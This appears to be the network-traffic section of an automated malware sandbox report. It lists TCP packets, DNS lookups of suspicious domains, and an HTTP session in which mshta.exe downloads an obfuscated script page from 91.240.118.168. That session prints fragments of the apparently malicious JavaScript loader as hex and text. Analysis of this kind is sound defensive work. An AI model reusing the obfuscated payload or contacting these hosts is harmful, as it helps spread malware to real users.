                                                                                                                    Jan 28, 2022 21:24:49.753721952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.753757000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.753787041 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.755369902 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.755409002 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.755433083 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.756953001 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.756989956 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.757014036 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.758604050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.758641005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.758683920 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.760106087 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.760142088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.760166883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.761636972 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.761672974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.761714935 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.763217926 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.763252974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.763290882 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.764709949 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.764749050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.764781952 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.766210079 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.766247034 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.766287088 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.767709017 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.767749071 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.767781019 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.769226074 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.769267082 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.769299030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.770680904 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.770729065 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.770781040 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.772209883 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.772247076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.772284985 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.773610115 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.773646116 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.773672104 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.775069952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.775105953 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.775156021 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.776506901 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.776541948 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.776571035 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.777965069 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.778001070 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.778017998 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.779299974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.779339075 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.779365063 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.780664921 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.780704021 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.780721903 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.782044888 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.782079935 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.782110929 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.783435106 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.783472061 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.783500910 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.784804106 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.784842014 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.784905910 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.786149979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.786190033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.786247969 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.787411928 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.787451029 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.787486076 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.788681030 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.788717031 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.788748026 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.789956093 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.789993048 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.790105104 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.791208982 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.791246891 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.791306973 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.792603970 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.792644024 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.792738914 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.793700933 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.793739080 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.793807030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.794909000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.794948101 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.795022964 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.796176910 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.796215057 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.796287060 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.797385931 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.797421932 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.797488928 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.798625946 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.798659086 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.798767090 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.799875975 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.799905062 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.800024033 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.801002979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.801028967 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.801160097 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.802154064 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.802180052 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.802257061 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.803406000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.803478956 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.803550005 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.812290907 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.812320948 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.812378883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.819497108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.819529057 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.819674015 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.819977999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.820000887 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.820069075 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.821111917 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.821141005 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.821193933 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.822207928 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.822236061 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.822299004 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.823316097 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.823340893 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.823398113 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.824444056 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.824469090 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.824525118 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.829144001 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.829173088 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.829238892 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.910661936 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.910686016 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.910801888 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.912337065 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.912364960 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.912439108 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.914218903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.914815903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.914880991 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.915651083 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.915676117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.915713072 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.917300940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.917325974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.917377949 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.918898106 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.918921947 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.918976068 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.920623064 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.920649052 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.920691967 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.922024965 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.922051907 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.922107935 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.922501087 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:50.129097939 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:54.089521885 CET4916780192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:25:03.689187050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:25:03.689333916 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:25:52.879694939 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:25:52.879770994 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:26:27.935133934 CET4916880192.168.2.2291.240.118.168
                                                                                                                    Jan 28, 2022 21:26:27.995944977 CET804916891.240.118.168192.168.2.22
                                                                                                                    Jan 28, 2022 21:26:28.043776989 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:26:28.060997963 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:26:28.061165094 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:26:29.962857962 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:26:30.367966890 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:26:31.179229021 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:26:32.786159039 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:26:36.000029087 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:26:42.412225008 CET4917080192.168.2.2274.208.236.157

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:24:47.921374083 CET5216753192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:24:47.943814039 CET53521678.8.8.8192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.295170069 CET5059153192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:24:48.314129114 CET53505918.8.8.8192.168.2.22

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Jan 28, 2022 21:24:47.921374083 CET192.168.2.228.8.8.80xb743Standard query (0)kuyporn.comA (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:24:48.295170069 CET192.168.2.228.8.8.80x3abfStandard query (0)jeffreylubin.igclout.comA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Jan 28, 2022 21:24:47.943814039 CET8.8.8.8192.168.2.220xb743No error (0)kuyporn.com172.67.149.209A (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:24:47.943814039 CET8.8.8.8192.168.2.220xb743No error (0)kuyporn.com104.21.11.177A (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:24:48.314129114 CET8.8.8.8192.168.2.220x3abfNo error (0)jeffreylubin.igclout.com74.208.236.157A (IP address)IN (0x0001)

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • 91.240.118.168
                                                                                                                    • kuyporn.com
                                                                                                                    • jeffreylubin.igclout.com

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.224916791.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:24:41.280599117 CET0OUTGET /qqw/aas/se.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:24:41.342391014 CET2INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:24:41 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 11230
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:39:54 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1cdba-2bde"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 76 4c 47 34 38 37 51 32 66 62 6e 57 62 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 64 33 66 55 68 51 42 66 55 57 33 30 33 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 64 33 66 55 68 51 42 66 55 57 33 30 33 5b 30 5d 3d 27 63 5c 31 36 31 5c 31 37 31 52 25 35 30 25 33 32 65 25 33 37 27 20 20 20 3b 76 4c 47 34 38 37 51 32 66 62 6e 57 62 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 5c 5c 7f 31 7f 36 7f 36 7f 61 7f 72 7f 25 7f 32 7f 30 7f 25 7f 37 7f 31 7f 79 7f 25 7f 33 7f 37 7d 25 7f 44 7d 1e 7d 5c 27 7f 32 7d 5c 27 7f 33 7f 42 7f 71 7d 18 7d 22 7d 25 7f 38 7d 28 7f 25 7f 35 7f 33 7d 21 7f 34 7d 21 7f 32 7f 25 7f 36 7f 39 7f 6e 7f 67 7d 1e 7f 45 7d 3d 7f 36 7f 72 7f 6f 7d 18 7f 35 7f 35
                                                                                                                    Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'\\166ar%20%71y%37}%D}}\'2}\'3Bq}}"}%8}(%53}!4}!2%69ng}E}=6ro}55
                                                                                                                    Jan 28, 2022 21:24:41.342415094 CET3INData Raw: 7f 25 7f 34 7f 33 7d 48 7f 30 7f 61 7d 18 7f 36 7f 32 7f 43 7d 3d 7f 46 7d 18 7f 34 7f 34 7f 65 7d 1e 7d 34 7f 33 7f 31 7d 25 7d 38 7d 53 7d 25 7d 5e 7f 33 7d 20 7f 32 7f 39 7d 25 7f 42 7d 44 7e 48 7d 5b 7f 69 7d 35 7d 64 7d 68 7d 48 7d 63 7d 54
                                                                                                                    Data Ascii: %43}H0a}62C}=F}44e}}431}%}8}S}%}^3} 29}%B}D~H}[i}5}d}h}H}c}T3}<}]}%6}b}h}=}g2}i}}}}g7}/}$}&}}i3})}"}1}c}47})}.}Du}H}x6}M}4~_}0}Q1|}w}[|za}!B}qf| 2}^64}H}\'||1}Ient}Bdo}=|6}J6D}W5|t}|/
                                                                                                                    Jan 28, 2022 21:24:41.342437029 CET4INData Raw: 7f 3a 7f 20 7f 56 79 65 7f 64 7e 2e 7f 61 7f 2c 7f 20 7b 64 7f 69 7e 36 78 68 7f 48 7f 65 7f 6c 7f 76 79 7a 61 7f 69 7f 63 78 67 78 52 7e 2e 7f 73 7f 2d 79 64 7d 06 7f 66 7f 3b 7f 20 78 58 78 79 7f 69 7f 7a 7f 65 78 61 7f 31 7f 32 7f 70 7f 78 78
                                                                                                                    Data Ascii: : Vyed~.a, {di~6xhHelvyzaicxgxR~.s-yd}f; xXxyizexa12pxx}x9x;rxa#Fwwx}backg}F}d-w\n~Hw\rx?6xA>ThexRourym x9|D of this paz w4w6}F|fc|fx6by <b~gxXxRxTxVxJx:w wFCCw!~#~% G
                                                                                                                    Jan 28, 2022 21:24:41.342466116 CET6INData Raw: 33 30 25 32 43 5c 31 35 34 69 25 33 44 25 32 37 25 32 37 25 33 42 5c 31 34 34 25 36 46 25 37 42 25 36 43 25 33 39 25 33 44 6c 25 33 34 25 32 45 63 5c 31 35 30 5c 31 34 31 25 37 32 43 25 36 46 5c 31 34 34 65 5c 31 30 31 5c 31 36 34 25 32 38 25 35
                                                                                                                    Data Ascii: 30%2C\154i%3D%27%27%3B\144%6F%7B%6C%39%3Dl%34%2Ec\150\141%72C%6F\144e\101\164%28%5F%31%29%3B\154%49%3Dl%34' ;function j51ONw04kefg6ni(v7DA2n1){cvpCeE6r5+=v7DA2n1};vLG487Q2fbnWb[0]+='%|fxxY|Dx9~-~2~4xan~4ewwMwwOwwRxA~refx%~p~@/~Bw
                                                                                                                    Jan 28, 2022 21:24:41.342492104 CET7INData Raw: 7f 49 74 60 72 0c 72 5c 72 74 19 7f 65 7f 77 78 69 74 6e 76 2c 7d 16 7f 62 76 5a 76 36 7f 42 7f 65 7f 67 76 16 7f 5c 27 7f 2c 7f 5c 27 7f 61 7f 66 76 5c 27 71 0c 71 0e 72 6c 71 11 71 09 73 4d 7f 65 7a 12 7f 64 71 10 71 12 71 14 79 65 71 1d 78 07
                                                                                                                    Data Ascii: It`rr\rtewxitnv,}bvZv6Begv\',\'afv\'qqrlqqsMezdqqqyeqxr$rV}q{d~-y}~Wqw$}qx,dyqaqvgqw[vqsMviqu=sqs!q7nputqpq$rCr&s%ruBsx!tv2(qMsZxtyd~\':s%uEq\'qq*({,qcqesF7qgqiqdqjqhqkuBwd}zak;
